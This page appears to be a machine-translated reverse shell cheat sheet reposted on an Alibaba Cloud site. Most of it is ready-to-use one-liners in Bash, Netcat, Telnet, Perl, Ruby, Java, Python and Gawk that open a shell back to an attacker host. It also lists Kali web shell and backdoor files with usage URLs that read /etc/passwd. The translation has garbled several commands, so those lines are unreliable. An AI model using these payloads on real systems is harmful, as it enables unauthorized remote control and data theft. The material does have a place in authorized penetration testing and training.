Reverse Shell Cheat Sheet

Last Update:2015-11-04 Source: Internet

Author: User

Tags stdin

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Use Netcat to listen locally to an allowed legitimate port, such as 80/443

[email protected]:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...

Note: If you are attacking a bouncing machine inside a NAT routing network, then you need to turn on port forwarding to access that network, such as the Port_forward module in Metasplioit

Bash Reverse Shells

exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done  

# or:

while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

Php-r ' $sock =fsockopen ("Attacking-ip"), exec ("/bin/sh-i <&3 >&3 2>&3"); ' (assumes TCP uses file descriptor 3.) If it doesn ' t work, try 4,5, or 6)

Netcat Reverse Shell

nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

Rm-f/tmp/p; mknod/tmp/p p && telnet Attacking-ip 0/tmp/p

Telnet ATTACKING-IP 80 | /bin/bash | Telnet ATTACKING-IP 443

Perl Reverse Shell

Perl-e ' use Socket; $i = "Attacking-ip"; $p =80;socket (S,pf_inet,sock_stream,getprotobyname ("TCP")); if (Connect (S), Sockaddr_in ($p, Inet_aton ($i))) {Open (STDIN, ">&s"), open (STDOUT, ">&s"), open (STDERR, ">&s"); EXEC ("/bin/sh-i");}; '

Perl Windows Reverse Shell

Perl-mio-e ' $c =new io::socket::inet (peeraddr, "attacking-ip:80"); Stdin->fdopen ($c, R); $~->fdopen ($c, W); System$_ while<>; '

Perl-e ' use Socket; $i = "Attacking-ip"; $p =80;socket (S,pf_inet,sock_stream,getprotobyname ("TCP")); if (Connect (S), Sockaddr_in ($p, Inet_aton ($i))) {Open (STDIN, ">&s"), open (STDOUT, ">&s"), open (STDERR, ">&s"); EXEC ("/bin/sh-i");}; '

Ruby Reverse Shell

Ruby-rsocket-e ' F=tcpsocket.open ("Attacking-ip"). To_i;exec sprintf ("/bin/sh-i <&%d >&%d 2>& %d ", f,f,f) '

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Python Reverse Shell

Python-c ' Import socket,subprocess,os;s=socket.socket (socket.af_inet,socket. SOCK_STREAM); S.connect (("Attacking-ip"); Os.dup2 (S.fileno (), 0); Os.dup2 (S.fileno (), 1); Os.dup2 (S.fileno (), 2);p =subprocess.call (["/bin/sh", "-I"]); '

Gawk Reverse Shell

#!/usr/bin/gawk -fBEGIN {
        Port    =       8080
        Prompt  =       "bkd> "

        Service = "/inet/tcp/" Port "/0/0"
        while (1) {
                do {
                        printf Prompt |& Service
                        Service |& getline cmd
                        if (cmd) {
                                while ((cmd |& getline) > 0)
                                        print $0 |& Service
                                close(cmd)
                        }
                } while (cmd != "exit")
                close(Service)
        }}

Kali Web Shells

Kali PHP Web Shells

/usr/share/webshells/php/php-reverse-shell.php	Pen Test monkey-php Reverse Shell
/usr/share/webshells/php/php-findsock-shell.php /usr/share/webshells/php/findsock.c	Pen Test Monkey, Findsock Shell. Build gcc-o findsock findsock.c (be mindfull of the target servers architecture), execute with Netcat not a browser nc-v Target 80
/usr/share/webshells/php/simple-backdoor.php	PHP Backdoor, usefull for CMD execution if Upload/code injection is possible, usage:http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
/usr/share/webshells/php/php-backdoor.php	Larger PHP Shell, with a text input box for command execution.

Kali Perl Reverse Shell

/usr/share/webshells/perl/perl-reverse-shell.pl

Pen Test Monkey-perl Reverse Shell

/usr/share/webshells/perl/perlcmd.cgi

Pen Test Monkey, Perl Shell.

usage:http://target.com/perlcmd.cgi?cat/etc/passwd

Kali Cold Fusion Shell

/usr/share/webshells/cfm/cfexec.cfm

Cold Fusion Shell-aka CFM Shell

Kali ASP Shell

/usr/share/webshells/asp/

Kali ASP Shells

Kali ASPX Shells

/usr/share/webshells/aspx/

Kali ASPX Shells

Kali JSP Reverse Shell

/usr/share/webshells/jsp/jsp-reverse.jsp

Kali JSP Reverse Shell

Original link Address: https://highon.coffee/blog/reverse-shell-cheat-sheet/

Some other articles about forwarding bounce summaries:

Penetration testing: Bounce and forward summary-Reverse Shell During the penetration test:http://le4f.net/post/post/ Reverse-shell-during-the-penetration-test

Two bloggers also have some good things on their blogs that can be useful for reading more.

Reverse Shell Cheat Sheet

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More